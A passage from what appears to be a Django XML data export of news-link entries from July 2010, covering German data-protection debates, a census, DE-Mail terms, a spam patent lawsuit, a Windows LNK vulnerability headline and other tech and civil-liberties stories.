&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.weser-kurier.de/Artikel/Bremen/Vermischtes/203991/Bremer+Proteste+gegen+Datensammlung.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/26/bremerprotestegegendatensammlungweser-kuri.png</field><field type="SlugField" name="slug">bremerprotestegegendatensammlungweser-kuri</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-26 22:40:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">zensus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="333" model="submitter.newsentry"><field type="CharField" name="title">Nord-Datenschutz-Chef: Volkszählung überflüssig - Nachrichten Newsticker - dpa_nt - regioline_nt - hamburgschleswigholstein_nt - WELT ONLINE</field><field type="TextField" name="excerpt">Schleswig-Holsteins Datenschutz-Chef Thilo Weichert hält die 2011 geplante Volkszählung für überflüssig. «Für politische Planungen sind genaue Zahlen wichtig, doch die haben wir auch ohne eine umfassende Volkszählung», sagte er den «Lübecker Nachrichten»</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Schleswig-Holsteins Datenschutz-Chef Thilo Weichert hält die 2011 geplante Volkszählung für überflüssig. «Für politische Planungen sind genaue Zahlen wichtig, doch die haben wir auch ohne eine umfassende Volkszählung», sagte er den «Lübecker Nachrichten»
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.welt.de/newsticker/dpa_nt/regioline_nt/hamburgschleswigholstein_nt/article8630362/Volkszaehlung-ueberfluessig.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/nord-datenschutz-chefvolkszahlunguberflussig.png</field><field type="SlugField" name="slug">nord-datenschutz-chefvolkszahlunguberflussig</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 22:58:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">zensus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="332" model="submitter.newsentry"><field type="CharField" name="title">AGBs der DE-Mail</field><field type="TextField" name="excerpt">- dürfen keine rechts- oder sittenwidrigen Inhalte im System eingestellt werden und es darf nicht auf solche Inhalte hingewiesen werden. Dazu zählen vor allem Inhalte, die im Sinne der §§ 130, 130 a und 131 StGB der Volksverhetzung dienen, zu Straftaten anleiten oder Gewalt verherrlichen oder verharmlosen, sexuell anstößig sind, im Sinne der §§ 184 ff. StGB pornografisch sind, geeignet sind, Kinder oder Jugendliche sittlich schwer zu gefährden oder in ihrem Wohl zu beeinträchtigen *oder das Ansehen der DPAG schädigen können*.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;ul&gt;
&lt;li&gt;
dürfen keine rechts- oder sittenwidrigen Inhalte im System eingestellt werden und es darf nicht auf solche Inhalte hingewiesen werden. Dazu zählen vor allem Inhalte, die im Sinne der §§ 130, 130 a und 131 StGB der Volksverhetzung dienen, zu Straftaten anleiten oder Gewalt verherrlichen oder verharmlosen, sexuell anstößig sind, im Sinne der §§ 184 ff. StGB pornografisch sind, geeignet sind, Kinder oder Jugendliche sittlich schwer zu gefährden oder in ihrem Wohl zu beeinträchtigen &lt;em&gt;oder das Ansehen der DPAG schädigen können&lt;/em&gt;.
&lt;/li&gt;
&lt;/ul&gt;</field><field type="CharField" name="external_url">https://www.epost.de/adressreservierung/footer/rechtliches/agb.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/agbsderde-mail.png</field><field type="SlugField" name="slug">agbsderde-mail</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 22:52:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">agb de-mail</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="331" model="submitter.newsentry"><field type="CharField" name="title">Yes Men documentary goes online via Bittorrent to evade censorship</field><field type="TextField" name="excerpt">Prankster activists The Yes Men are sick of having the videos depicting their shenanigans taken down through copyright complaints, so they've put the latest video, a full-length doc called The Yes Men Fix the World up as a torrent file through VODO, resistant to censorship and easy to get. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Prankster activists The Yes Men are sick of having the videos depicting their shenanigans taken down through copyright complaints, so they've put the latest video, a full-length doc called The Yes Men Fix the World up as a torrent file through VODO, resistant to censorship and easy to get.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://vodo.net/yesmen</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/yesmendocumentarygoesonlineviabittorrentto.png</field><field type="SlugField" name="slug">yesmendocumentarygoesonlineviabittorrentto</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 17:01:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">bittorrent, censorship, copyfight, digital media</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="330" model="submitter.newsentry"><field type="CharField" name="title">
Amiga: 25 Years Later </field><field type="TextField" name="excerpt">Amiga turns 25. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Amiga turns 25.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://technologizer.com/2010/07/23/amiga/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/amiga25yearslater.png</field><field type="SlugField" name="slug">amiga25yearslater</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 12:34:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">amiga commodore</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="329" model="submitter.newsentry"><field type="CharField" name="title">42 finale Thesen zum Internet | 137b zeitweise</field><field type="TextField" name="excerpt">42 finale Thesen zum Internet
Publiziert am 20. Juli 2010 von zeitweise
Das Netz ist groß.
Das Netz ist größer als du dir vorstellen kannst.
Es ist größer als der Ölteppich im Golf von Mexiko.
Wenn du es von Japanern auf Reiskörner transkribieren ließest, dann bräuchtest du so viele Reiskörner, dass Kim Yong-il zum Mittagessen seine Atomwaffen verspeisen müsste.
Und würdest du davon ein You-Tube-Video drehen, also von Kim Yong-il wie er seine Atomwaffen verspeist, dann wäre das Netz so groß, dass sich mehr als 100 Millionen Menschen dieses Video ansähen.
Und ein anderer würde kommen und dein Video rippen und ein süßes Kätzchen hineinschneiden.
Und die Leute würden es lieben.
Leute, die du in deinem Leben nicht kennenlernen wirst.
Leute, die du in deinem Leben nicht kennenlernen willst.
Deinen Nachbarn zum Beispiel.
Aber das musst du auch nicht. Das Netz lässt dir die freie Wahl.
Du bist der Held in diesem Abenteuer. Du entscheidest, welche Links du klickst, ob du dich bei Parship oder Ebay anmeldest, ob du bingst oder googlest, ob du bei Facebook deine Daten verschenkst oder bei Twitter deine Gedanken.
Es gibt Menschen, denen macht das Angst. Deshalb hassen sie das Netz. Sie wollen Leitplanken, feste Regeln und gottgegebene Werte. Sie wollen gesagt bekommen, was sie zu tun haben, damit sie sich nicht den Kopf darüber zerbrechen müssen, was sie tun wollen.
Das Netz sagt es dir nicht.
Das Netz sagt: „I can haz cheeseburger.“
Aber du kannst keinen Cheeseburger haben im Netz. Und selbst wenn dir Amazon einen Cheeseburger schickt, dann gibt es dahinter einen Menschen, der die Patties entfrostet, das Fleisch brät und es in Ketchup ertränkt. Einen Menschen, der in dieser Zeit für dich darauf verzichtet, nachzusehen, welcher Shitstorm gerade auf Twitter heraufzieht.
Und deshalb ist Dankbarkeit angebracht. Dankbarkeit dafür, dass es Menschen gibt, die uns den Rücken freihalten, während wir unser Netz gestalten.
Und wie das so sein müsste in einer idealen Gesellschaft, geben wir ihnen etwas zurück. Denn auch der Patty-Mann freut sich, wenn er nach einem langen Arbeitstag noch ein bisschen Nerdcore klicken kann.
Wir stricken unsere Gedanken zu Häkelschweinen und literal Videos und zeigen sie der Welt.
Wir borgen uns die beste schwarze Knete und die beste weiße und formen aus zwei Klassikern ein neues Werk. Eines das zeigt, dass es mehr gibt als Schwarz und Weiß. Tausend schillernde Grauschattierungen.
Wir recherchieren Informationen, prüfen, entwickeln weiter. Wir sammeln und bewerten sie und verstecken sie in Wikis.
Und wenn wir sie selbst vergessen: Das Netz vergisst sie nicht.
Selbstlos steht es bereit, um Generationen zukünftiger Archäologen in Brot und Arbeit zu bringen.
Denn im Netz gestalten wir die Zukunft.
Und in Wikipedia die Vergangenheit.
Und auf Twitter die Gegenwart.
Das Netz ist unser Gedächtnis. Ein Gütiges, Neutrales. Es speichert gleichberechtigt die 0:8 Niederlage der Maltesischen Fußballnationalmannschaft 76 wie die 11 Dimensionen der Stringtheorie.
Es gibt dem grün geschnäbelten Twitterer eine Stimme, der sein erstes „Hallo Welt!“ in die Weite ruft wie dem Sascha Lobo, der sich einen süffisanten Netzpolitikwitz über die SPD verkneift.
Es fördert die Kooperation und die Kommunikation.
Es lässt Menschen über den Globus hinweg an Software schreiben, die sich im gleichen Land gegenseitig die Arbeitsplätze wegnehmen würden.
Es bietet Vollbeschäftigung, denn in seiner Endlosigkeit gibt es stets genug zu tun.
Für die Produzenten und die Konsumenten und die Prosumenten. Denn was die Wirklichkeit da draußen nicht versteht: Der eine ist ohne den anderen nichts. Eine Formspring-Seite ohne Fragen, ein ungeflattrtes Flattr-Thing, ein Facepalm ohne Hand und Gesicht.
Die Aufmerksamkeit ist die Währung des Internets. Doch der, der viel davon bekommt, kann doch nicht mehr ausgeben als jeder andere. Der Reichtum entkoppelt vom Prassen. Ein Kapitalistenalbtraum.
Und deshalb muss alles zurücktransferiert werden in die echte Welt, versilbert, vergoldet, monetarisiert. Weil man sonst ja hungert und Hungern auf den ersten Blick zwar eine schlanke Figur, aber auf Dauer recht unglücklich macht.
Und so liegt die Realität in ständigem Clinch mit dem Netz. Wie Schäuble und die Bürgerrechte.
Und Missionare ziehen in die neue Welt mit Fackeln und Kanonen, um sie zu zivilisieren. Die Datenautobahn soll ein Parkplatz werden mit Feuerwehreinfahrtszone und Parkscheinautomat.
Doch das Netz zu bekämpfen ist so schwer wie ein Loch im Ozean zu stopfen. Denn es spiegelt die menschliche Natur.
Es lässt sich nicht fassen.
Denn wir sind das Netz.
Große, Kleine, Dicke, Dünne, Dumme, Deppen und Idioten. Wortverdreher, Wortversteher. Frauen, Männer, Transvestiten. Zwitter, Nerds und Aleviten. Zum Leidwesen aller auch reimende Blogger. Menschen könnte man sie nennen. Oder Kriminelle.
Das ist eine Sache der Perspektive. Verhandelbar und verhandelt wird es. Im sich selbst ähnlichen Meta-Medium Internet. Das tausend Fragen aufwirft.
Und eine Antwort auf alle Fragen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;42 finale Thesen zum Internet
Publiziert am 20. Juli 2010 von zeitweise
Das Netz ist groß.
Das Netz ist größer als du dir vorstellen kannst.
Es ist größer als der Ölteppich im Golf von Mexiko.
Wenn du es von Japanern auf Reiskörner transkribieren ließest, dann bräuchtest du so viele Reiskörner, dass Kim Yong-il zum Mittagessen seine Atomwaffen verspeisen müsste.
Und würdest du davon ein You-Tube-Video drehen, also von Kim Yong-il wie er seine Atomwaffen verspeist, dann wäre das Netz so groß, dass sich mehr als 100 Millionen Menschen dieses Video ansähen.
Und ein anderer würde kommen und dein Video rippen und ein süßes Kätzchen hineinschneiden.
Und die Leute würden es lieben.
Leute, die du in deinem Leben nicht kennenlernen wirst.
Leute, die du in deinem Leben nicht kennenlernen willst.
Deinen Nachbarn zum Beispiel.
Aber das musst du auch nicht. Das Netz lässt dir die freie Wahl.
Du bist der Held in diesem Abenteuer. Du entscheidest, welche Links du klickst, ob du dich bei Parship oder Ebay anmeldest, ob du bingst oder googlest, ob du bei Facebook deine Daten verschenkst oder bei Twitter deine Gedanken.
Es gibt Menschen, denen macht das Angst. Deshalb hassen sie das Netz. Sie wollen Leitplanken, feste Regeln und gottgegebene Werte. Sie wollen gesagt bekommen, was sie zu tun haben, damit sie sich nicht den Kopf darüber zerbrechen müssen, was sie tun wollen.
Das Netz sagt es dir nicht.
Das Netz sagt: „I can haz cheeseburger.“
Aber du kannst keinen Cheeseburger haben im Netz. Und selbst wenn dir Amazon einen Cheeseburger schickt, dann gibt es dahinter einen Menschen, der die Patties entfrostet, das Fleisch brät und es in Ketchup ertränkt. Einen Menschen, der in dieser Zeit für dich darauf verzichtet, nachzusehen, welcher Shitstorm gerade auf Twitter heraufzieht.
Und deshalb ist Dankbarkeit angebracht. Dankbarkeit dafür, dass es Menschen gibt, die uns den Rücken freihalten, während wir unser Netz gestalten.
Und wie das so sein müsste in einer idealen Gesellschaft, geben wir ihnen etwas zurück. Denn auch der Patty-Mann freut sich, wenn er nach einem langen Arbeitstag noch ein bisschen Nerdcore klicken kann.
Wir stricken unsere Gedanken zu Häkelschweinen und literal Videos und zeigen sie der Welt.
Wir borgen uns die beste schwarze Knete und die beste weiße und formen aus zwei Klassikern ein neues Werk. Eines das zeigt, dass es mehr gibt als Schwarz und Weiß. Tausend schillernde Grauschattierungen.
Wir recherchieren Informationen, prüfen, entwickeln weiter. Wir sammeln und bewerten sie und verstecken sie in Wikis.
Und wenn wir sie selbst vergessen: Das Netz vergisst sie nicht.
Selbstlos steht es bereit, um Generationen zukünftiger Archäologen in Brot und Arbeit zu bringen.
Denn im Netz gestalten wir die Zukunft.
Und in Wikipedia die Vergangenheit.
Und auf Twitter die Gegenwart.
Das Netz ist unser Gedächtnis. Ein Gütiges, Neutrales. Es speichert gleichberechtigt die 0:8 Niederlage der Maltesischen Fußballnationalmannschaft 76 wie die 11 Dimensionen der Stringtheorie.
Es gibt dem grün geschnäbelten Twitterer eine Stimme, der sein erstes „Hallo Welt!“ in die Weite ruft wie dem Sascha Lobo, der sich einen süffisanten Netzpolitikwitz über die SPD verkneift.
Es fördert die Kooperation und die Kommunikation.
Es lässt Menschen über den Globus hinweg an Software schreiben, die sich im gleichen Land gegenseitig die Arbeitsplätze wegnehmen würden.
Es bietet Vollbeschäftigung, denn in seiner Endlosigkeit gibt es stets genug zu tun.
Für die Produzenten und die Konsumenten und die Prosumenten. Denn was die Wirklichkeit da draußen nicht versteht: Der eine ist ohne den anderen nichts. Eine Formspring-Seite ohne Fragen, ein ungeflattrtes Flattr-Thing, ein Facepalm ohne Hand und Gesicht.
Die Aufmerksamkeit ist die Währung des Internets. Doch der, der viel davon bekommt, kann doch nicht mehr ausgeben als jeder andere. Der Reichtum entkoppelt vom Prassen. Ein Kapitalistenalbtraum.
Und deshalb muss alles zurücktransferiert werden in die echte Welt, versilbert, vergoldet, monetarisiert. Weil man sonst ja hungert und Hungern auf den ersten Blick zwar eine schlanke Figur, aber auf Dauer recht unglücklich macht.
Und so liegt die Realität in ständigem Clinch mit dem Netz. Wie Schäuble und die Bürgerrechte.
Und Missionare ziehen in die neue Welt mit Fackeln und Kanonen, um sie zu zivilisieren. Die Datenautobahn soll ein Parkplatz werden mit Feuerwehreinfahrtszone und Parkscheinautomat.
Doch das Netz zu bekämpfen ist so schwer wie ein Loch im Ozean zu stopfen. Denn es spiegelt die menschliche Natur.
Es lässt sich nicht fassen.
Denn wir sind das Netz.
Große, Kleine, Dicke, Dünne, Dumme, Deppen und Idioten. Wortverdreher, Wortversteher. Frauen, Männer, Transvestiten. Zwitter, Nerds und Aleviten. Zum Leidwesen aller auch reimende Blogger. Menschen könnte man sie nennen. Oder Kriminelle.
Das ist eine Sache der Perspektive. Verhandelbar und verhandelt wird es. Im sich selbst ähnlichen Meta-Medium Internet. Das tausend Fragen aufwirft.
Und eine Antwort auf alle Fragen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.137b.org/?p=660</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/42finalethesenzuminternet137bzeitweise.png</field><field type="SlugField" name="slug">42finalethesenzuminternet137bzeitweise</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 01:53:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">internet thesen</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="328" model="submitter.newsentry"><field type="CharField" name="title">Turn an inkjet into a 3D printer - Boing Boing</field><field type="TextField" name="excerpt">Ink Jet printer converted into a 3d printer</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ink Jet printer converted into a 3d printer
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boingboing.net/2010/07/24/turn-an-inkjet-into.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/turnaninkjetintoa3dprinter-boingboing.png</field><field type="SlugField" name="slug">turnaninkjetintoa3dprinter-boingboing</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 01:44:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">3d print</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="327" model="submitter.newsentry"><field type="CharField" name="title">Pentagon workers tied to child porn - The Boston Globe</field><field type="TextField" name="excerpt">Wer ist Child P0rn Kunde? "several dozen Pentagon officials and contractors with high-level security clearances" as found by the FBI</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wer ist Child P0rn Kunde? "several dozen Pentagon officials and contractors with high-level security clearances" as found by the FBI
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boston.com/news/nation/washington/articles/2010/07/23/pentagon_workers_tied_to_child_porn/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/pentagonworkerstiedtochildporn-thebostong.png</field><field type="SlugField" name="slug">pentagonworkerstiedtochildporn-thebostong</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 00:48:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">child porn, fbi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="326" model="submitter.newsentry"><field type="CharField" name="title">Spam Filtering? Patented! 36 Companies Sued | Techdirt</field><field type="TextField" name="excerpt"> 36 companies have been sued for patent infringement in Marshall, Texas (of course) for supposedly violating a patent (6,018,761) on spam filtering. The companies sued represent a who's who of corporate America, including Apple, Google, HP, RIM, Citigroup, Capital One, Alcatel Lucent, AIG, AOL, JP Morgan Chase, McAfee, Symantec, Yahoo, IBM and many others.
The patent itself is rather simple. Not much more than a database lookup. In full:
What is claimed is:
A method of obtaining context information about a sender of an electronic message using a mail processing comprising the steps of:
scanning the message, usinig the mail processine program to determine if the message contains a reference in a header portion of the message to at least one feature of the sender's context, wherein the sender's context is information about the sender or the message that is usefiul to the recipient in understanding more about the context in which the sender sent the message;
if the message contains such reference, using the mail processing program and such reference to obtain [sender] the context information from a location external to the message;
if the message does not contain such reference, using the mail processing program and information present in the message to indirectly obtain the [sender] context information using external reference sources to find a reference to the [sender] context information.
The method of claim 1, wherein the reference to at least one feature is a reference to a location where context information is stored.
The method of claim 1, wherein the reference to at least one feature is a hint usable to retrieve a location where context information is stored.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; 36 companies have been sued for patent infringement in Marshall, Texas (of course) for supposedly violating a patent (6,018,761) on spam filtering. The companies sued represent a who's who of corporate America, including Apple, Google, HP, RIM, Citigroup, Capital One, Alcatel Lucent, AIG, AOL, JP Morgan Chase, McAfee, Symantec, Yahoo, IBM and many others.
&lt;/p&gt;
&lt;p&gt;The patent itself is rather simple. Not much more than a database lookup. In full:
&lt;/p&gt;
&lt;p&gt;What is claimed is:
A method of obtaining context information about a sender of an electronic message using a mail processing comprising the steps of:
&lt;/p&gt;
&lt;p&gt;scanning the message, usinig the mail processine program to determine if the message contains a reference in a header portion of the message to at least one feature of the sender's context, wherein the sender's context is information about the sender or the message that is usefiul to the recipient in understanding more about the context in which the sender sent the message;
if the message contains such reference, using the mail processing program and such reference to obtain [sender] the context information from a location external to the message;
if the message does not contain such reference, using the mail processing program and information present in the message to indirectly obtain the [sender] context information using external reference sources to find a reference to the [sender] context information.
&lt;/p&gt;
&lt;p&gt;The method of claim 1, wherein the reference to at least one feature is a reference to a location where context information is stored.
&lt;/p&gt;
&lt;p&gt;The method of claim 1, wherein the reference to at least one feature is a hint usable to retrieve a location where context information is stored.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.techdirt.com/articles/20100722/02481510317.shtml</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/spamfilteringpatented36companiessuedtech_.png</field><field type="SlugField" name="slug">spamfilteringpatented36companiessuedtech</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 00:40:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">patent spam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="324" model="submitter.newsentry"><field type="CharField" name="title">heise online - LNK-Lücke in Windows: Angriffswelle rollt an</field><field type="TextField" name="excerpt">LNK-Hack: Von Industriespionage (inkl. 0-day) zum Massenwurm.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;LNK-Hack: Von Industriespionage (inkl. 0-day) zum Massenwurm.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/LNK-Luecke-in-Windows-Angriffswelle-rollt-an-1044228.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/heiseonline-lnk-luckeinwindowsangriffswelle.png</field><field type="SlugField" name="slug">heiseonline-lnk-luckeinwindowsangriffswelle</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 00:33:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">microsoft vulnerability windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="323" model="submitter.newsentry"><field type="CharField" name="title">Gegenentwurf zum Beschäftigtendatenschutz-Gesetzentwurf online</field><field type="TextField" name="excerpt">Die Grünen haben einen Gegenentwurf zum stark [kritisierten](http://www.bfdi.bund.de/bfdi_forum/showthread.php?1311-Besch%C3%A4ftigtendatenschutz-Was-lange-w%C3%A4hrt-sollte-doch-eigentlich-gut-werden!) Beschäftigungsdatenschutz-Gesetzentwurf der Bundesregierung veröffentlicht.
Das besondere daran: Der Gegenentwurf wurde in einem dafür erstellten Blog online gestellt und es wurde um Kommentare, Kritik und Anregungen der Bürger gebeten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Grünen haben einen Gegenentwurf zum stark &lt;a href="http://www.bfdi.bund.de/bfdi_forum/showthread.php?1311-Besch%C3%A4ftigtendatenschutz-Was-lange-w%C3%A4hrt-sollte-doch-eigentlich-gut-werden!"&gt;kritisierten&lt;/a&gt; Beschäftigungsdatenschutz-Gesetzentwurf der Bundesregierung veröffentlicht.
Das besondere daran: Der Gegenentwurf wurde in einem dafür erstellten Blog online gestellt und es wurde um Kommentare, Kritik und Anregungen der Bürger gebeten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://beschaeftigten-datenschutz.de/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/25/gegenentwurf-zum-beschaftigtendatenschutz-gesetzen.png</field><field type="SlugField" name="slug">gegenentwurf-zum-beschaftigtendatenschutz-gesetzen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-25 00:02:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">datenschutz</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="322" model="submitter.newsentry"><field type="CharField" name="title">Hospital: files with personal, medical data on 800,000 gone - SC Magazine US</field><field type="TextField" name="excerpt">Krankenhaus schickt Backupbänder zum schreddern. Dort kommen sie nicht an. 800.000 Datensätze enthalten Social Security numbers, addresses, phone numbers, birth dates, health plan information, in addition to diagnoses and treatments, according to the 318-bed hospital. There also was some credit card and bank account information stored on the files.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Krankenhaus schickt Backupbänder zum schreddern. Dort kommen sie nicht an. 800.000 Datensätze enthalten Social Security numbers, addresses, phone numbers, birth dates, health plan information, in addition to diagnoses and treatments, according to the 318-bed hospital. There also was some credit card and bank account information stored on the files.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.scmagazineus.com/hospital-files-with-personal-medical-data-on-800000-gone/article/174970/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/23/hospital-files-with-personal-medical-data-on-800.png</field><field type="SlugField" name="slug">hospital-files-with-personal-medical-data-on-800</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-23 23:32:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">dataloss hospital</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="321" model="submitter.newsentry"><field type="CharField" name="title">South African doctor invents anti-rape female condoms with teeth</field><field type="TextField" name="excerpt">Sonnet Ehlers, a doctor in South Africa, has designed, patented, and manufactured an "anti-rape female condom" with the unambiguous brand name Rape-aXe. Women who believe they are at high risk of being raped insert the device into themselves like a tampon, and wear it around indefinitely as a form of protection when anticipating risk. The "teeth" inside cause intense pain and potential injury to a male upon penetration, and basically clamp down, making exit from the device painful. The thing does leave damage.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sonnet Ehlers, a doctor in South Africa, has designed, patented, and manufactured an "anti-rape female condom" with the unambiguous brand name Rape-aXe. Women who believe they are at high risk of being raped insert the device into themselves like a tampon, and wear it around indefinitely as a form of protection when anticipating risk. The "teeth" inside cause intense pain and potential injury to a male upon penetration, and basically clamp down, making exit from the device painful. The thing does leave damage.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boingboing.net/2010/07/22/south-african-doctor.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/23/south-african-doctor-invents-anti-rape-female.png</field><field type="SlugField" name="slug">south-african-doctor-invents-anti-rape-female</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-23 16:54:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">freedom protection</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="319" model="submitter.newsentry"><field type="CharField" name="title">Australian government blocks out 90% of document on web-spying plans</field><field type="TextField" name="excerpt">Australia's web-censors have outdone themselves. After Stephen Conroy (the Australian minister notorious for proposing the Great Firewall of Australia) promised greater transparency in his government's efforts to regulate the Internet, they replied to a Freedom of Information request on plans to monitor Australians' internet traffic with a document that was 90 percent blacked out.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Australia's web-censors have outdone themselves. After Stephen Conroy (the Australian minister notorious for proposing the Great Firewall of Australia) promised greater transparency in his government's efforts to regulate the Internet, they replied to a Freedom of Information request on plans to monitor Australians' internet traffic with a document that was 90 percent blacked out.
